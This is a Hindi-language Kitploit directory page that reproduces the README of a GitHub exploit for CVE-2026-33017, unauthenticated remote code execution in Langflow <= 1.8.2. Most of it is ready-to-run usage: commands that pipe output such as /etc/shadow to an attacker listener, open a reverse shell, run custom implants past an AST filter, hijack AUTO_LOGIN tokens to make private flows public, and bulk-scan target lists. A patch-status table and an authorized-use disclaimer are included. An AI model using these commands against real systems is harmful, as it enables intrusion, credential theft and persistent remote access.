Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33017-Exploit — # CVE-2026-33017 के लिए एक्सप्लॉइट — Langflow <= 1.8.2 में फ्लो बिल्ड एंडपॉइंट में exec() के माध्यम से बिना प्रमाणीकरण के RCE | Kitploit
उपकरण/GitHubGitHub/oscar-mine/cve-2026-33017-exploit
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHuboscar-mine/cve-2026-33017-exploit

CVE-2026-33017-Exploit

# CVE-2026-33017 के लिए एक्सप्लॉइट — Langflow <= 1.8.2 में फ्लो बिल्ड एंडपॉइंट में exec() के माध्यम से बिना प्रमाणीकरण के RCE

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-33017 - Langflow अनप्रमाणित RCE

root@kitploit:~
        _____
       /     \
      | () () |
       \  ^  /
        |||||

exec() बिना प्रमाणीकरण, बिना सैंडबॉक्स, बिना उम्मीद।

Langflow <= 1.8.2 POST /api/v1/build_public_tmp/{flow_id}/flow एंडपॉइंट के माध्यम से अनप्रमाणित रिमोट कोड निष्पादन की अनुमति देता है। नोड परिभाषाओं में मनमाना Python युक्त हमलावर-आपूर्ति किया गया फ्लो डेटा सीधे exec() को शून्य सैंडबॉक्सिंग के साथ पास किया जाता है।

  • CVSS: 9.8 क्रिटिकल
  • CWE: CWE-94 (कोड इंजेक्शन), CWE-306 (अनुपस्थित प्रमाणीकरण)
  • प्रभावित: Langflow <= 1.8.2 (1.9.0-dev0 से dev11 सहित)
  • ठीक किया गया: Langflow 1.9.0
  • CISA KEV: 2026-03-25 को जोड़ा गया
  • जंगल में शोषित: खुलासे के 20 घंटों के भीतर

किल चेन

root@kitploit:~
POST /api/v1/build_public_tmp/{flow_id}/flow
  -> chat.py -> start_flow_build() -> build_graph_from_data()
  -> Graph.from_payload() -> loading.py -> eval.py create_class()
  -> validate.py prepare_global_scope() -> exec(compiled_code)
  -> arbitrary code runs as the server process. game over.

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/oscarmine/CVE-2026-33017.git
cd CVE-2026-33017
pip install requests

उपयोग

रिकॉन - जाँचें कि लक्ष्य असुरक्षित है या नहीं

root@kitploit:~
python3 exploit.py --url http://target:7860 --check

ब्लाइंड कमांड निष्पादन

root@kitploit:~
python3 exploit.py --url http://target:7860 --cmd "id"

GET कॉलबैक के माध्यम से आउटपुट एक्सफिल्ट्रेट करें (URL पथ में base64)

root@kitploit:~
# टर्मिनल 1: लिसनर शुरू करें
python3 -m http.server 8080

# टर्मिनल 2: एक्सप्लॉइट चलाएँ
python3 exploit.py --url http://target:7860 --cmd "id" \
  --callback-get http://your-ip:8080

# अपने लिसनर लॉग से base64 डिकोड करें:
echo "dWlkPTEwMDAo..." | base64 -d

POST कॉलबैक के माध्यम से आउटपुट एक्सफिल्ट्रेट करें (बॉडी में कच्चा आउटपुट)

root@kitploit:~
# टर्मिनल 1: लिसनर शुरू करें
nc -l 8080

# टर्मिनल 2: एक्सप्लॉइट चलाएँ
python3 exploit.py --url http://target:7860 --cmd "cat /etc/shadow" \
  --callback-post http://your-ip:8080

# कच्चा आउटपुट सीधे POST बॉडी में आता है - डिकोडिंग की आवश्यकता नहीं

रिवर्स शेल

root@kitploit:~
# टर्मिनल 1: लिसनर शुरू करें
nc -l 4444

# टर्मिनल 2: एक्सप्लॉइट चलाएँ
python3 exploit.py --url http://target:7860 --revshell your-ip 4444

कस्टम Python पेलोड

root@kitploit:~
python3 exploit.py --url http://target:7860 --payload-file implant.py

पेलोड फ़ाइल नियम:

  • कोड prepare_global_scope() के अंदर exec() के माध्यम से मॉड्यूल स्तर पर चलता है
  • असाइनमेंट का उपयोग करना चाहिए (जैसे _x = os.popen(...).read()) क्योंकि AST फ़िल्टर केवल Assign, FunctionDef, ClassDef नोड्स निष्पादित करता है
  • ब्लॉकिंग कॉल्स को async इवेंट लूप को मारने से बचने के लिए threading.Thread(daemon=True) का उपयोग करना चाहिए

निजी फ्लो को स्वतः प्रमोट करें

जब कोई PUBLIC फ्लो मौजूद नहीं है लेकिन AUTO_LOGIN सक्षम है (कई डिप्लॉयमेंट में डिफ़ॉल्ट):

root@kitploit:~
python3 exploit.py --url http://target:7860 --auto-promote --cmd "id"

यह AUTO_LOGIN टोकन को हाईजैक करता है, पहले फ्लो को PUBLIC में PATCH करता है, फिर उसका शोषण करता है।

बल्क स्कैन

एक फ़ाइल से कई लक्ष्यों को स्कैन करें (केवल भेद्यता जाँच):

root@kitploit:~
python3 exploit.py --scan-file targets.txt
python3 exploit.py --scan-file targets.txt --threads 20 --scan-output results.txt

targets.txt प्रारूप:

root@kitploit:~
http://10.10.10.5:7860
http://10.10.10.6:7860
192.168.1.100:7860
# comments are ignored

आउटपुट दिखाता है:

  • संस्करण पहचान (असुरक्षित / पैच किया गया)
  • AUTO_LOGIN स्थिति (मुफ्त टोकन = आसान एस्केलेशन)
  • PUBLIC फ्लो की संख्या (तुरंत शोषण के लिए तैयार)

Burp के माध्यम से प्रॉक्सी

root@kitploit:~
python3 exploit.py --url http://target:7860 --cmd "id" \
  --proxy http://127.0.0.1:8080

यह कैसे काम करता है

  1. संस्करण जाँच - लक्ष्य को फिंगरप्रिंट करने के लिए /api/v1/version को प्रोब करता है
  2. फ्लो डिस्कवरी - फ्लो को एन्यूमरेट करने और PUBLIC खोजने के लिए AUTO_LOGIN (यदि सक्षम है) का उपयोग करता है
  3. पेलोड इंजेक्शन - code फ़ील्ड में दुर्भावनापूर्ण Python युक्त CustomComponent नोड के साथ एक न्यूनतम फ्लो ग्राफ तैयार करता है
  4. कोड निष्पादन - तैयार किए गए data पैरामीटर के साथ /api/v1/build_public_tmp/{flow_id}/flow पर POST करता है। Langflow ग्राफ को संकलित करता है, जो हमलावर के कोड पर create_class() -> prepare_global_scope() -> exec() को कॉल करता है

v1.9.0 में फिक्स data पैरामीटर को पूरी तरह से हटा देता है, एंडपॉइंट को डेटाबेस से केवल संग्रहीत फ्लो डेटा का उपयोग करने के लिए मजबूर करता है।

पैच विश्लेषण

संदर्भ

  • NVD - CVE-2026-33017
  • JFrog Research - patch bypass analysis
  • Sysdig - exploitation in 20 hours
  • CISA KEV
  • Fix commit
  • GitHub Advisory: GHSA-rvqx-wpfh-mfx7

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा अनुसंधान के लिए है। केवल उन सिस्टमों के विरुद्ध उपयोग करें जिन्हें परीक्षण करने की आपके पास स्पष्ट अनुमति है। लेखक दुरुपयोग के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें
संस्करण
स्थिति
<= 1.8.1असुरक्षित
1.8.2चेंजलॉग में फिक्स का दावा किया गया लेकिन कोड कभी नहीं बदला गया (JFrog ने पुष्टि की)
1.9.0-dev0 से dev11अभी भी असुरक्षित
1.9.0वास्तव में ठीक किया गया - एंडपॉइंट से data पैरामीटर हटाया गया